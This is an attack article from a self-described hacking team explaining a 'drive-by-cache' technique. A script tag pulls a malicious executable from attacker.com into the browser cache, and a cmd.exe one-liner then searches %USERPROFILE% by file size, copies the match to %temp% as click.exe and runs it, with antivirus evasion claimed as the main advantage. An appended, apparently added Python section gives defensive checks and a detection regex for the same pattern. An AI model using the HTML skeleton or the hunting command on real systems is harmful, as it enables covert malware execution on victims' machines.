Author : "vinnu"
Team : Legion Of Xtremers
Special Thanx : Secfence Team
Greets : Lord DeathStorm, Prashant Uniyal, b0nd, Fb1h2s, G4H, all my well/bad wishers.
Drive-by-Cache
This technique is an alternative to the widely deployed drive-by-download. Unlike drive-by-download
shellcode, the shellcode in this technique does not download anything from a remote location.
In the drive-by-cache technique, the malware is instead downloaded by the browser or application itself.
The URL of the malware file is placed in the src attribute of an img, script or similar tag, and the browser/application
downloads the file and saves it into its own cache folder.
Suppose a malicious executable malware.exe resides on attacker.com; then the following skeleton is enough to force
the browser to download it:
<----dbc.htm---->
<html>
<body>
<script src="http://www.attacker.com/malware.exe"></script>
<!--
exploit code and shellcode
-->
</body>
</html>
<!-------------->
The locations of the cache folders differ between browsers, but all of them lie somewhere below the %USERPROFILE%
folder.
The malware is downloaded before the exploitation and saved into the cache; then the exploit fires, and
if it succeeds, the shellcode hunts for a file whose size in bytes equals that of malware.exe on the attacker.com
server.
The shellcode in this case is a command-execution shellcode. The hard part of this technique is
locating the file in the browser's/application's cache, because in most cases the file is saved under a temporary name.
So the file has to be copied with an ".exe" extension before it can be executed.
Suppose we have placed a (Windows XP) calc.exe on the server as malware.exe; its size is
114688 bytes, and the following command hunts for it in the %USERPROFILE% subfolders:
cmd.exe /c for /R "%USERPROFILE%\" %i IN (*) DO if %~zi equ 114688 cmd.exe /c copy "%i" "%temp%\click.exe" /y & "%temp%\click.exe"
The command above copies the matching file to the %temp% folder as click.exe and executes it.
The main advantage of this technique is that most antivirus products are bypassed, because the browser/application
itself downloads the malicious file in the ordinary way.
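The two artefacts this technique leaves behind are a PE image sitting in a browser cache under a non-executable name and a process command line that walks %USERPROFILE% comparing file sizes before copying a hit to %temp% as an .exe. The following defender-side checks are an added example, not part of the original article; the cache layout, file names and the `_HUNT_RE` pattern are constructed assumptions for a stand-alone run.

```python
"""Defender checks for the drive-by-cache pattern: cached PE files and the cache-hunting one-liner."""
import os
import re
import tempfile

# Shape of the hunting command from the article: a recursive FOR /R, a size
# compare via %~z<var> equ <bytes>, then a copy to a new .exe. The pattern is
# an assumption; tune it to how your process-creation logs render the line.
_HUNT_RE = re.compile(
    r"for\s+/R\b.*%~z\w\s+equ\s+\d+.*\bcopy\b.*\.exe", re.IGNORECASE)


def is_cache_hunt_cmdline(cmdline: str) -> bool:
    """True if a process command line matches the size-hunting copy-and-run shape."""
    return bool(_HUNT_RE.search(cmdline))


def find_cached_pe_files(root: str) -> list:
    """Return files below root that start with the PE 'MZ' magic but do not
    carry an executable extension, i.e. a binary fetched via a script/img tag."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".exe", ".dll")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if fh.read(2) == b"MZ":
                        hits.append(path)
            except OSError:
                continue  # unreadable cache entry; skip rather than abort the scan
    return sorted(hits)


def build_sample_cache() -> str:
    """Constructed cache directory: one PE header under a temp-style name,
    one PNG and one script, mimicking what a browser would store."""
    root = tempfile.mkdtemp(prefix="dbc_cache_")
    sub = os.path.join(root, "Content.IE5", "A1B2C3D4")
    os.makedirs(sub)
    with open(os.path.join(sub, "malware[1].tmp"), "wb") as fh:
        fh.write(b"MZ" + b"\x90" * 62 + b"PE\x00\x00")  # constructed PE header only
    with open(os.path.join(sub, "logo[1].png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n")
    with open(os.path.join(sub, "ga[1].js"), "wb") as fh:
        fh.write(b"var x = 1;")
    return root


if __name__ == "__main__":
    print(find_cached_pe_files(build_sample_cache()))
```

On a real host, point `find_cached_pe_files` at the browser cache directories below %USERPROFILE% and feed `is_cache_hunt_cmdline` the CommandLine field of process-creation events.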
..."vinnu"